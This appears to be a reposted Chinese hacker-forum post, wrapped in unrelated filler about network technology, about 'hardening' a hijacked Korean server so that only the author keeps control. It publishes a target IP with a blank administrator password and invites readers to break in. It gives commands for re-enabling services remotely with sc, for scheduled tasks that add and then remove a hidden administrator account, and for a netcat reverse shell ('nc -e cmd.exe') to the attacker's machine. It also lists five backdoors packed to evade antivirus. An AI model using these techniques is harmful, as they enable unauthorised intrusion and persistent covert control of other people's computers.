发布时间:2023-09-09 来源:win7旗舰版 浏览量:
网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。 首先申明,我很菜的,绝对是一个菜鸟。今天忽然很有兴趣想跟我一样菜的菜鸟来玩这个游戏。当做一个小测试吧。所以如果你是高手的话就不用往下看了。 今天花了点时间对台肉机作了点小小的安全配置。 韩国机。没做IP策略。没做端口过滤。端口开放:21,25,80,135,139,445,3306,3389 211.42.93.200 administrator 密码为空。(绝对是管理员帐号) 任务是:拿到c:\winnt\system.txt,读出里面的内容。 说明:至少有3种以上的方法可进入主机 答案是用sc.exe SORRY,由于我的疏忽(我只检查了2次),造成无法IPC连接。因为是 弱口令,所以之前已经有同行进入肉机并且做了个BAT文件来删除IPC$ .而我也只是断了他留下了的后门(当时并没有发现这个BAT文件,真 失败),所以后来我看到有人说无法IPC连接,我才上去net share ipc$ 这个“小游戏”是我又看了沉睡不醒的<<构建一只安全的肉鸡>>一时兴 起做的,目的是想看大家的思路,下面是我的具体做法和对<<构建一只安全的肉鸡>> 的一点补充: 1,查看补丁情况 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\HotFix 发现已打了SP3补丁,省事,倒也省了我不少工夫。 2,修改注册表,禁止空连接,删除admin$,C$,D$等等。 关掉Admin$ 服务器: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters AutoShareServer = DWORD:00000000 工作站: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters AutoShareWks = DWORD:00000000 禁止空会话: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA RestrictAnonymous = DWORD:00000001 或者“控制面板”-“本地(域)安全策略”-“安全选项”里...... 立刻从新启动lanmanserver服务,使其生效。 注意:现在并没有删除IPC$连接。 3,看一下有没有可疑帐号,如肉机是server以下版本,用CCA.EXE查看 是否有克隆帐号,如是AD-server就看一下管理员有没有可疑帐号,有就 删除它吧。 4,我在肉机上装了RADMIN,winshell(脱壳并加壳,目的是防止被杀毒 软件杀掉),WinEggDrop Shell。为了防止其他人进入肉机,用WinEggDrop Shell 的fport功能,打开“服务”窗口看一下没有可疑服务,进程,有的话就停服务 杀进程(pskill),删除相关的程序。 5,虽然有开80端口,但只是默认装了IIS,肉机本身并没有什么网站,而且 而且也装了SP3,不会有什么漏洞。更详细的资料请看<<构建一只安全的肉鸡>> 6,服务”-“snmp service”-“属性页”-“安全”那个“接受团体名称”也就是 “public”,它就是snmp访问口令。把它改成一个安全的口令。小心!一些暴力破解。 这个漏洞,危害虽然没有那么直接,但还是有的,暴露系统的类型和具体的版本, 获取帐号列表,运行服务信息.....。 7,开了3306端口,用的mysql,没有什么漏洞。如是MSSQL,就要小心了, 看看补丁情况,没补的话就补上吧。 8,虽然现在除了IPC$,没有什么C盘D盘的共享了,但已防万一,把at.exe 改一下名。禁用并停止WMI服务,禁用并停止再删除telnet服务(从 注册表中删除) 9,停止远程注册表服务(Remote Registry Service),这个也很危险喔) 10,虽然administrator是管理员帐号,但是我禁止了它登陆终端服务器)。 好了,现在用终端连接服务器,opentelnet RTCS.vbe,psexec也连不上了。 因为psexec默认用的c:\winnt\system32\cmd.exe,但删除C$,所以使用 psexec显示拒绝访问。我试过建个共享文件夹,copy个cmd.exe到这个文件 共享文件夹,然后再用psexec也不行。那现在只能用的是ipc$,也到了SC.EXE 出场了,一个常被人忘记的程序。我们只是禁用并停止了WMI服务,但 我们仍然可以用打开WMI服务,而不用理会这个服务是否禁用,是否需要 手动开启。而且就算这个服务被删除了,我们也可以重新创建它。 sc \\ip config WinMgmt start= auto 看到命令成功的提示了吗?那现在就可以用eva的那个RTCS.vbe来telnet了, 同样,可以利用还有telnet服务。 如果你用终端连接服务器登陆的话会发现administrator没有登陆会话权, 其实只是“计算机管理”-帐号-“属性”-“禁止登陆终端服务器”而已。 用sc开启远程注册表服务,然后“连接网络注册表”修改注册表使其重新 启动后可以登陆。 其实我们大可做ipsec来过滤掉135,135,445端口,但这样做改动太大,怕管理员 发现,而且肉机如果是日文,韩文,那怎么办?如果我们做了个BAT文件来删除 IPC$,并且每次随肉机启动而运行。这个连sc.exe也没用了。我们还有 下面的做法,利用计划任务,这个方法是星云大哥以前提过的 1).在晚上10点运行这个3个命令 net share ipc$ net user user password /add net localgroup administrators user /add 2).在早上6点运行这个3个命令 net share ipc$ /del net localgroup administrators user /del net user user /del 用命令行来做吧,够隐蔽 其实我们还可以加个nc 你的本机IP 54 >> nc -e cmd.exe上去上面的程序行, (当然这个nc.exe是传上去的,不过小心被杀掉,一般杀素软件都认为nc.exe是病毒) 然后在本机用nc -l -p 54 这时nc就会反向发一个shell给你,防火墙就会为你转发数据。 数一数,装了5个后门 1,Radmin 2,WinEggDrop Shell 3,winshell 4,计划任务来建用户,也算后门吧 5,nc.exe开反向连接后门 本文写得很乱,也没有一点技术的细节,因为我太菜,上面只是我的一点体会 让我们一起进步吧。。。 网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。 |
首先申明,我很菜的,绝对是一个菜鸟。今天忽然很有兴趣想跟我一样菜的菜鸟来玩这个游戏。当做一个小测试